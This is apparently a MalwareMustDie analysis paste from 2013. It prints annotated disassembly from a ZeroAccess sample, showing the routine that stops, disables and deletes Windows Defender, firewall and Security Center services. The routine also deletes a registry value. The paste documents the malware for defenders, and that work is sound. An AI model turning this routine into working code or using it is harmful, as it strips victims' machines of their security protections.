MalwareMustDie

#MalwareMustDie! ZeroAccess: killing processes PoC

Feb 6th, 2013
  1. // #MalwareMustDie! Case contants.exe ZeroAccess RECYCLER
  2. // Case: http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html
  3. // In the .text PE section the routine below was found; it stops
  4. // and then deletes each of the following Windows services:
  5. // MsMpSvc, windefend, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe
  6. // @unixfreaxjp /malware]$ date | Wed Feb 6 15:53:41 JST 2013
  7.  
  8. // usage of DisableThreadLibraryCalls :
  9. // A function that lets a DLL disable the DLL_THREAD_ATTACH and DLL_THREAD_DETACH notification calls.
  10.  
  11. 0x4017FB push [ebp+hLibModule] ; hLibModule
  12. 0x4017FE call ds:DisableThreadLibraryCalls
  13. 0x401804 call sub_4016D1
  14. 0x401809 test eax, eax
  15. 0x40180B jz short loc_401832
  16.  
  17. // Opening a registry key and, if that succeeds, deleting one value from it
  18.  
  19. 0x402659 call ds:ZwOpenKey
  20. 0x40265F test eax, eax
  21. 0x402661 jl short loc_40267A
  22. 0x402663 push offset asc_41D0DC ; " \""
  23. 0x402668 push [ebp+hSCObject]
  24. 0x40266B call ds:ZwDeleteValueKey
  25. 0x402671 push [ebp+hSCObject]
  26. 0x402674 call ds:ZwClose
  27.  
  28. // Using the OpenSCManagerW
  29.  
  30. 0x40267A loc_40267A: ; CODE XREF: sub_402634+2Dj
  31. 0x40267A push 0F003Fh ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
  32. 0x40267F push 0 ; lpDatabaseName
  33. 0x402681 push 0 ; lpMachineName
  34. 0x402683 call ds:OpenSCManagerW ; Establish a connection to the service
  35. ; control manager on the specified computer
  36. ; and opens the specified database
  37. 0x402689 mov [ebp+hSCObject], eax
  38. 0x40268C test eax, eax
  39. 0x40268E jz loc_40274B
  40. 0x402694 push ebx
  41. 0x402695 push esi
  42. 0x402696 push edi
  43.  
  44. // opening service "MsMpSvc"
  45.  
  46. 0x402697 mov edi, ds:OpenServiceW
  47. 0x40269D mov ebx, 0F01FFh
  48. 0x4026A2 push ebx ; dwDesiredAccess = SERVICE_ALL_ACCESS (0F01FFh)
  49. 0x4026A3 push offset ServiceName ; "MsMpSvc"
  50. 0x4026A8 push eax ; hSCManager
  51. 0x4026A9 call edi ; OpenServiceW
  52. 0x4026AB test eax, eax
  53. 0x4026AD jz short loc_4026B6
  54. 0x4026AF mov esi, eax
  55. 0x4026B1 call sub_4024E2
  56.  
  57. // opening service "windefend"
  58.  
  59. 0x4026B6 loc_4026B6: ; CODE XREF: sub_402634+79j
  60. 0x4026B6 push ebx ; dwDesiredAccess
  61. 0x4026B7 push offset aWindefend ; "windefend"
  62. 0x4026BC push [ebp+hSCObject] ; hSCManager
  63. 0x4026BF call edi ; OpenServiceW
  64. 0x4026C1 test eax, eax
  65. 0x4026C3 jz short loc_4026CC
  66. 0x4026C5 mov esi, eax
  67. 0x4026C7 call sub_4024E2
  68.  
  69. // opening service "SharedAccess"
  70.  
  71. 0x4026CC loc_4026CC: ; CODE XREF: sub_402634+8Fj
  72. 0x4026CC push ebx ; dwDesiredAccess
  73. 0x4026CD push offset aSharedaccess ; "SharedAccess"
  74. 0x4026D2 push [ebp+hSCObject] ; hSCManager
  75. 0x4026D5 call edi ; OpenServiceW
  76. 0x4026D7 test eax, eax
  77. 0x4026D9 jz short loc_4026E2
  78. 0x4026DB mov esi, eax
  79. 0x4026DD call sub_4024E2
  80. 0x4026E2
  81.  
  82. // opening service "iphlpsvc"
  83.  
  84. 0x4026E2 loc_4026E2: ; CODE XREF: sub_402634+A5j
  85. 0x4026E2 push ebx ; dwDesiredAccess
  86. 0x4026E3 push offset aIphlpsvc ; "iphlpsvc"
  87. 0x4026E8 push [ebp+hSCObject] ; hSCManager
  88. 0x4026EB call edi ; OpenServiceW
  89. 0x4026ED test eax, eax
  90. 0x4026EF jz short loc_4026F8
  91. 0x4026F1 mov esi, eax
  92. 0x4026F3 call sub_4024E2
  93. 0x4026F8
  94.  
  95. // opening service "wscsvc"
  96.  
  97. 0x4026F8 loc_4026F8: ; CODE XREF: sub_402634+BBj
  98. 0x4026F8 push ebx ; dwDesiredAccess
  99. 0x4026F9 push offset aWscsvc ; "wscsvc"
  100. 0x4026FE push [ebp+hSCObject] ; hSCManager
  101. 0x402701 call edi ; OpenServiceW
  102. 0x402703 test eax, eax
  103. 0x402705 jz short loc_40270E
  104. 0x402707 mov esi, eax
  105. 0x402709 call sub_4024E2
  106. 0x40270E
  107.  
  108. // opening service "mpssvc"
  109.  
  110. 0x40270E loc_40270E: ; CODE XREF: sub_402634+D1j
  111. 0x40270E push ebx ; dwDesiredAccess
  112. 0x40270F push offset aMpssvc ; "mpssvc"
  113. 0x402714 push [ebp+hSCObject] ; hSCManager
  114. 0x402717 call edi ; OpenServiceW
  115. 0x402719 test eax, eax
  116. 0x40271B jz short loc_402724
  117. 0x40271D mov esi, eax
  118. 0x40271F call sub_4024E2
  119. 0x402724
  120.  
  121. // opening service "bfe"
  122.  
  123. 0x402724 loc_402724: ; CODE XREF: sub_402634+E7j
  124. 0x402724 push ebx ; dwDesiredAccess
  125. 0x402725 push offset aBfe ; "bfe"
  126. 0x40272A push [ebp+hSCObject] ; hSCManager
  127. 0x40272D call edi ; OpenServiceW
  128. 0x40272F test eax, eax
  129. 0x402731 jz short loc_40273A
  130. 0x402733 mov esi, eax
  131. 0x402735 call sub_4024E2
  132. 0x40273A
  133.  
  134. // Close the SCM handle and restore the saved registers
  135.  
  136. 0x40273A loc_40273A: ; CODE XREF: sub_402634+FDj
  137. 0x40273A push [ebp+hSCObject] ; hSCObject
  138. 0x40273D call ds:CloseServiceHandle
  139. 0x402743 call sub_402593
  140. 0x402748 pop edi
  141. 0x402749 pop esi
  142. 0x40274A pop ebx
  143.  
  144. // sub_4024E2 is called once per service that OpenServiceW succeeded on (handle in esi)
  145.  
  146. 0x4024E2 sub_4024E2 proc near ; stop, disable and delete one service
  147. 0x4024E2 ; In:    esi = hService (handle returned by OpenServiceW in the caller)
  148. 0x4024E2 ServiceStatus = _SERVICE_STATUS ptr -1Ch ; 1Ch = 28 bytes = sizeof(SERVICE_STATUS)
  149. 0x4024E2 ; Out:   nothing meaningful; eax holds the last API result and is not checked
  150. 0x4024E2 sub esp, 1Ch ; reserve the SERVICE_STATUS local
  151. 0x4024E5 push edi ; save callee-saved edi; it is reused as the retry counter
  152. 0x4024E6 push 4
  153. 0x4024E8 pop edi ; edi = 4: at most four stop attempts
  154. 0x4024E9
  155.  
  156. // Stop loop: ControlService(SERVICE_CONTROL_STOP), retried up to 4 times
  157. // with a 1 s sleep while dependent services are still running
  158. 0x4024E9 loc_4024E9: ; retry-loop head
  159. 0x4024E9 lea eax, [esp+20h+ServiceStatus] ; eax = &ServiceStatus (+20h accounts for the pushed edi)
  160. 0x4024ED push eax ; lpServiceStatus
  161. 0x4024EE push 1 ; dwControl = SERVICE_CONTROL_STOP (1)
  162. 0x4024F0 push esi ; hService
  163. 0x4024F1 call ds:ControlService ; ask the SCM to stop the service
  164. 0x4024F7 test eax, eax
  165. 0x4024F9 jnz short loc_402516 ; stop request accepted: go disable/delete
  166. 0x4024FB call ds:GetLastError
  167. 0x402501 cmp eax, 41Bh ; ERROR_DEPENDENT_SERVICES_RUNNING (1051)
  168. 0x402506 jnz short loc_402516 ; any other error: stop retrying, still disable/delete
  169. 0x402508 push 3E8h ; dwMilliseconds = 1000
  170. 0x40250D call ds:Sleep ; give dependents a second to wind down
  171. 0x402513 dec edi ; one attempt used
  172. 0x402514 jnz short loc_4024E9 ; retry while attempts remain
  173. 0x402516
  174. 0x402516 loc_402516: ; reached whether or not the stop succeeded
  175. 0x402516 xor eax, eax ; 0/NULL for every optional ChangeServiceConfigW argument below
  176. 0x402518 push eax ; lpDisplayName
  177. 0x402519 push eax ; lpPassword
  178. 0x40251A push eax ; lpServiceStartName
  179. 0x40251B push eax ; lpDependencies
  180. 0x40251C push eax ; lpdwTagId
  181. 0x40251D push eax ; lpLoadOrderGroup
  182. 0x40251E push eax ; lpBinaryPathName
  183. 0x40251F push eax ; dwErrorControl
  184. 0x402520 push 4 ; dwStartType = SERVICE_DISABLED
  185. 0x402522 push 20h ; dwServiceType = SERVICE_WIN32_SHARE_PROCESS
  186. 0x402524 push esi ; hService
  187.  
  188. // Disable the service so it cannot be restarted, then delete it and close the handle
  189.  
  190. 0x402525 call ds:ChangeServiceConfigW ; set start type to disabled; return value not checked
  191. 0x40252B push esi ; hService
  192. 0x40252C call ds:DeleteService ; mark the service for deletion; return value not checked
  193. 0x402532 push esi ; hSCObject = esi, i.e. the service handle (not the SCM handle)
  194. 0x402533 call ds:CloseServiceHandle
  195. 0x402539 pop edi ; restore callee-saved edi
  196. 0x40253A add esp, 1Ch ; free the SERVICE_STATUS local
  197. 0x40253D retn
  198. 0x40253D sub_4024E2 endp
  199.  
  200. ---
  201. #MalwareMustDie